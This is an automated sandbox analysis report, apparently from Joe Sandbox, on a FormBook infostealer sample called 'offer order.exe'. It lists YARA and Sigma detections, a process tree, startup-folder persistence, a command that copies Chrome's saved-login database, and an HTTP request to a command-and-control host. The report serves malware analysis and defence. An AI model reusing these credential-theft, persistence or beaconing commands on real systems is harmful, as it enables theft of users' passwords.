Loading ...

Play interactive tourEdit tour

Analysis Report offer order.exe

Overview

General Information

Sample Name:offer order.exe
Analysis ID:299672
MD5:92ce59db9a10fa135250802f6716e899
SHA1:6e70f2b79d7a2db3078636acef019470767a5edf
SHA256:2aef6190fbec261019520c2e603024eb0abf68eaf2460b3ed7c03c14754e5a09
Tags:exe

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Detected FormBook malware
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
Sigma detected: Steal Google chrome login data
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
AutoIt script contains suspicious strings
Binary is likely a compiled AutoIt script file
Initial sample is a PE file and has a suspicious name
Machine Learning detection for dropped file
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
PE file has a writeable .text section
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file access)
Uses ipconfig to lookup or modify the Windows network settings
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
OS version to string mapping found (often used in BOTs)
One or more processes crash
PE file contains strange resources
Potential key logger detected (key state polling based)
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Stores files to the Windows start menu directory
Stores large binary data to the registry
Tries to load missing DLLs
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • offer order.exe (PID: 6220 cmdline: 'C:\Users\user\Desktop\offer order.exe' MD5: 92CE59DB9A10FA135250802F6716E899)
    • offer ordermgr.exe (PID: 6232 cmdline: C:\Users\user\Desktop\offer ordermgr.exe MD5: D5CA6E1F080ABC64BBB11E098ACBEABB)
      • WerFault.exe (PID: 6164 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6232 -s 244 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
    • offer order.exe (PID: 6796 cmdline: C:\Users\user\Desktop\offer order.exe MD5: 92CE59DB9A10FA135250802F6716E899)
      • explorer.exe (PID: 3292 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • wlanext.exe (PID: 3192 cmdline: C:\Windows\SysWOW64\wlanext.exe MD5: CD1ED9A48316D58513D8ECB2D55B5C04)
          • cmd.exe (PID: 6336 cmdline: /c del 'C:\Users\user\UevAppMonitor\igfxCUIService.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 6324 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • cmd.exe (PID: 4772 cmdline: /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user~1\AppData\Local\Temp\DB1' /V MD5: F3BDBE3BB6F734E357235F4D5898582D)
        • ipconfig.exe (PID: 6844 cmdline: C:\Windows\SysWOW64\ipconfig.exe MD5: B0C7423D02A007461C850CD0DFE09318)
  • wscript.exe (PID: 6604 cmdline: 'C:\Windows\System32\WScript.exe' 'C:\Users\user\UevAppMonitor\lpremove.vbs' MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)
    • igfxCUIService.exe (PID: 5512 cmdline: 'C:\Users\user\UevAppMonitor\igfxCUIService.exe' MD5: 92CE59DB9A10FA135250802F6716E899)
      • igfxCUIServicemgr.exe (PID: 5860 cmdline: C:\Users\user\UevAppMonitor\igfxCUIServicemgr.exe MD5: D5CA6E1F080ABC64BBB11E098ACBEABB)
        • WerFault.exe (PID: 6424 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5860 -s 256 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
      • igfxCUIService.exe (PID: 4484 cmdline: C:\Users\user\UevAppMonitor\igfxCUIService.exe MD5: 92CE59DB9A10FA135250802F6716E899)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\lpremove.urlMethodology_Suspicious_Shortcut_Local_URLDetects local script usage for .URL persistence@itsreallynick (Nick Carr), @QW5kcmV3 (Andrew Thompson)
  • 0x13:$file: URL=file:///
  • 0x0:$url_explicit: [InternetShortcut]

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000C.00000002.359244107.0000000001820000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    0000000C.00000002.359244107.0000000001820000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x98b8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x9b32:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x157c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x152b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x158c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x15a3f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa6ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1452c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xb3b3:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1ab37:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1bb3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    0000000C.00000002.359244107.0000000001820000.00000040.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x18449:$sqlite3step: 68 34 1C 7B E1
    • 0x1855c:$sqlite3step: 68 34 1C 7B E1
    • 0x18478:$sqlite3text: 68 38 2A 90 C5
    • 0x1859d:$sqlite3text: 68 38 2A 90 C5
    • 0x1848b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x185b3:$sqlite3blob: 68 53 D8 7F 8C
    0000001A.00000002.358304950.00000000001D0000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      0000001A.00000002.358304950.00000000001D0000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x98b8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x9b32:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x157c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x152b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x158c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x15a3f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xa6ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x1452c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xb3b3:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1ab37:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1bb3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 25 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      22.2.igfxCUIService.exe.400000.1.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        22.2.igfxCUIService.exe.400000.1.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x8ab8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x8d32:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x149c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x144b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x14ac7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x14c3f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x98ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x1372c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xa5b3:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x19d37:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1ad3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        22.2.igfxCUIService.exe.400000.1.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x17649:$sqlite3step: 68 34 1C 7B E1
        • 0x1775c:$sqlite3step: 68 34 1C 7B E1
        • 0x17678:$sqlite3text: 68 38 2A 90 C5
        • 0x1779d:$sqlite3text: 68 38 2A 90 C5
        • 0x1768b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x177b3:$sqlite3blob: 68 53 D8 7F 8C
        22.2.igfxCUIService.exe.400000.1.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          22.2.igfxCUIService.exe.400000.1.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x98b8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x9b32:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x157c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x152b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x158c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x15a3f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0xa6ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x1452c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xb3b3:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x1ab37:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1bb3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 7 entries

          Sigma Overview

          System Summary:

          barindex
          Sigma detected: Drops script at startup locationShow sources
          Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Users\user\Desktop\offer order.exe, ProcessId: 6220, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\lpremove.url
          Sigma detected: Steal Google chrome login dataShow sources
          Source: Process startedAuthor: Joe Security: Data: Command: /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user~1\AppData\Local\Temp\DB1' /V, CommandLine: /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user~1\AppData\Local\Temp\DB1' /V, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: C:\Windows\SysWOW64\wlanext.exe, ParentImage: C:\Windows\SysWOW64\wlanext.exe, ParentProcessId: 3192, ProcessCommandLine: /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user~1\AppData\Local\Temp\DB1' /V, ProcessId: 4772

          Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Antivirus / Scanner detection for submitted sampleShow sources
          Source: offer order.exeAvira: detected
          Antivirus detection for dropped fileShow sources
          Source: C:\Users\user\UevAppMonitor\igfxCUIServicemgr.exeAvira: detection malicious, Label: W32/Sality.AB.2
          Source: C:\Users\user\UevAppMonitor\igfxCUIService.exeAvira: detection malicious, Label: W32/Ramnit.C
          Source: C:\Users\user\Desktop\offer ordermgr.exeAvira: detection malicious, Label: W32/Sality.AB.2
          Multi AV Scanner detection for dropped fileShow sources
          Source: C:\Users\user\Desktop\offer ordermgr.exeMetadefender: Detection: 88%Perma Link
          Source: C:\Users\user\Desktop\offer ordermgr.exeReversingLabs: Detection: 100%
          Source: C:\Users\user\UevAppMonitor\igfxCUIService.exeReversingLabs: Detection: 91%
          Source: C:\Users\user\UevAppMonitor\igfxCUIServicemgr.exeMetadefender: Detection: 88%Perma Link
          Source: C:\Users\user\UevAppMonitor\igfxCUIServicemgr.exeReversingLabs: Detection: 100%
          Multi AV Scanner detection for submitted fileShow sources
          Source: offer order.exeReversingLabs: Detection: 91%
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 0000000C.00000002.359244107.0000000001820000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000001A.00000002.358304950.00000000001D0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000C.00000002.359207981.00000000017F0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000016.00000002.343417017.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000016.00000002.344627421.0000000001710000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000C.00000002.356195697.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000016.00000002.344721716.0000000001740000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000017.00000002.494578696.0000000002BC0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000017.00000002.492758749.0000000000B30000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000017.00000002.491918579.0000000000990000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 22.2.igfxCUIService.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 22.2.igfxCUIService.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 12.2.offer order.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 12.2.offer order.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Machine Learning detection for dropped fileShow sources
          Source: C:\Users\user\UevAppMonitor\igfxCUIServicemgr.exeJoe Sandbox ML: detected
          Source: C:\Users\user\Desktop\offer ordermgr.exeJoe Sandbox ML: detected
          Source: 22.2.igfxCUIService.exe.40000.0.unpackAvira: Label: W32/Ramnit.C
          Source: 1.2.offer ordermgr.exe.400000.0.unpackAvira: Label: W32/Sality.AB.2
          Source: 22.2.igfxCUIService.exe.400000.1.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 0.0.offer order.exe.dc0000.0.unpackAvira: Label: W32/Ramnit.C
          Source: 12.0.offer order.exe.dc0000.0.unpackAvira: Label: W32/Ramnit.C
          Source: 12.2.offer order.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 12.2.offer order.exe.dc0000.1.unpackAvira: Label: W32/Ramnit.C
          Source: 6.0.igfxCUIService.exe.40000.0.unpackAvira: Label: W32/Ramnit.C
          Source: 1.0.offer ordermgr.exe.400000.0.unpackAvira: Label: W32/Sality.AB.2
          Source: 7.2.igfxCUIServicemgr.exe.400000.0.unpackAvira: Label: W32/Sality.AB.2
          Source: 22.0.igfxCUIService.exe.40000.0.unpackAvira: Label: W32/Ramnit.C
          Source: 7.0.igfxCUIServicemgr.exe.400000.0.unpackAvira: Label: W32/Sality.AB.2
          Source: C:\Users\user\Desktop\offer order.exeCode function: 12_2_00E24696 GetFileAttributesW,FindFirstFileW,FindClose,12_2_00E24696
          Source: C:\Users\user\Desktop\offer order.exeCode function: 12_2_00E2C9C7 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,12_2_00E2C9C7
          Source: C:\Users\user\Desktop\offer order.exeCode function: 12_2_00E2C93C FindFirstFileW,FindClose,12_2_00E2C93C
          Source: C:\Users\user\UevAppMonitor\igfxCUIService.exeCode function: 22_2_000A4696 GetFileAttributesW,FindFirstFileW,FindClose,22_2_000A4696
          Source: C:\Users\user\UevAppMonitor\igfxCUIService.exeCode function: 22_2_000AC93C FindFirstFileW,FindClose,22_2_000AC93C
          Source: C:\Users\user\UevAppMonitor\igfxCUIService.exeCode function: 22_2_000AC9C7 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,22_2_000AC9C7
          Source: C:\Users\user\UevAppMonitor\igfxCUIService.exeCode function: 22_2_000BCDF1 UnloadUserProfile,InterlockedIncrement,InterlockedDecrement,RaiseException,GetLastError,DecodePointer,IsDebuggerPresent,GetFullPathNameW,GetCurrentProcess,HeapAlloc,GetProcessHeap,HeapFree,Sleep,GetSystemInfo,LoadLibraryA,GetModuleFileNameW,GetCurrentProcess,TerminateProcess,lstrcpyW,VirtualAllocEx,CreateFileW,SetEndOfFile,WriteFile,FindFirstFileW,22_2_000BCDF1
          Source: C:\Users\user\UevAppMonitor\igfxCUIService.exeCode function: 22_2_000AF200 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,22_2_000AF200
          Source: C:\Users\user\UevAppMonitor\igfxCUIService.exeCode function: 22_2_000AF35D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,22_2_000AF35D
          Source: C:\Users\user\Desktop\offer order.exeCode function: 4x nop then pop edi12_2_00416D4E
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4x nop then pop edi23_2_009A6D4E
          Source: global trafficHTTP traffic detected: GET /n7ak/?Cn=2E6ngGAF4rnEW2DkFahn03SThRJS1GaFXvji6cQNcldFxHWCZGztCTkY2xtu2ML79DZ+6HkTcQ==&ojqX_T=8phhJj0P8JsL HTTP/1.1Host: www.belviderewrestling.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewASN Name: UNIFIEDLAYER-AS-1US UNIFIEDLAYER-AS-1US
          Source: C:\Users\user\Desktop\offer order.exeCode function: 12_2_00E325E2 InternetReadFile,InternetQueryDataAvailable,InternetReadFile,12_2_00E325E2
          Source: global trafficHTTP traffic detected: GET /n7ak/?Cn=2E6ngGAF4rnEW2DkFahn03SThRJS1GaFXvji6cQNcldFxHWCZGztCTkY2xtu2ML79DZ+6HkTcQ==&ojqX_T=8phhJj0P8JsL HTTP/1.1Host: www.belviderewrestling.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: unknownDNS traffic detected: queries for: www.allworljob.com
          Source: WerFault.exe, 00000004.00000003.249097052.00000000031A3000.00000004.00000001.sdmpString found in binary or memory: http://crl.m
          Source: WerFault.exe, 0000000B.00000003.299705606.0000000002A4D000.00000004.00000001.sdmpString found in binary or memory: http://crl.microH
          Source: explorer.exe, 00000010.00000000.326082966.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
          Source: explorer.exe, 00000010.00000000.326082966.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: explorer.exe, 00000010.00000000.315474462.0000000006840000.00000004.00000001.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/J
          Source: explorer.exe, 00000010.00000000.326082966.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: explorer.exe, 00000010.00000000.326082966.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
          Source: explorer.exe, 00000010.00000000.326082966.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
          Source: explorer.exe, 00000010.00000000.326082966.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
          Source: explorer.exe, 00000010.00000000.326082966.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: explorer.exe, 00000010.00000000.326082966.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
          Source: explorer.exe, 00000010.00000000.326082966.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
          Source: explorer.exe, 00000010.00000000.326082966.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
          Source: explorer.exe, 00000010.00000000.326082966.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
          Source: explorer.exe, 00000010.00000000.326082966.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
          Source: explorer.exe, 00000010.00000000.326082966.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
          Source: explorer.exe, 00000010.00000000.326082966.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: explorer.exe, 00000010.00000000.326082966.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: explorer.exe, 00000010.00000000.326082966.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: explorer.exe, 00000010.00000000.326082966.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: explorer.exe, 00000010.00000000.326082966.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: explorer.exe, 00000010.00000000.326082966.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: WerFault.exe, 00000004.00000003.249097052.00000000031A3000.00000004.00000001.sdmpString found in binary or memory: http://www.microsoft.co
          Source: explorer.exe, 00000010.00000000.326082966.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: explorer.exe, 00000010.00000000.326082966.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
          Source: explorer.exe, 00000010.00000000.326082966.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: explorer.exe, 00000010.00000000.326082966.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
          Source: explorer.exe, 00000010.00000000.326082966.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
          Source: explorer.exe, 00000010.00000000.326082966.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: explorer.exe, 00000010.00000000.326082966.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
          Source: WerFault.exe, 0000000B.00000002.301896121.0000000002A1B000.00000004.00000020.sdmpString found in binary or memory: https://watson.telemetry.microsoft
          Source: C:\Users\user\Desktop\offer order.exeCode function: 12_2_00E3425A OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,12_2_00E3425A
          Source: C:\Users\user\Desktop\offer order.exeCode function: 12_2_00E3425A OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,12_2_00E3425A
          Source: C:\Users\user\Desktop\offer order.exeCode function: 12_2_00E20219 GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,12_2_00E20219
          Source: igfxCUIServicemgr.exe, 00000007.00000002.307830238.00000000006CA000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
          Source: C:\Users\user\Desktop\offer order.exeCode function: 12_2_00E4CDAC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,12_2_00E4CDAC
          Source: C:\Users\user\UevAppMonitor\igfxCUIService.exeCode function: 22_2_000CCDAC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,22_2_000CCDAC

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 0000000C.00000002.359244107.0000000001820000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000001A.00000002.358304950.00000000001D0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000C.00000002.359207981.00000000017F0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000016.00000002.343417017.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000016.00000002.344627421.0000000001710000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000C.00000002.356195697.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000016.00000002.344721716.0000000001740000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000017.00000002.494578696.0000000002BC0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000017.00000002.492758749.0000000000B30000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000017.00000002.491918579.0000000000990000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 22.2.igfxCUIService.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 22.2.igfxCUIService.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 12.2.offer order.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 12.2.offer order.exe.400000.0.raw.unpack, type: UNPACKEDPE

          System Summary:

          barindex
          Detected FormBook malwareShow sources
          Source: C:\Windows\SysWOW64\wlanext.exeDropped file: C:\Users\user\AppData\Roaming\95N0Q4RA\95Nlogri.iniJump to dropped file
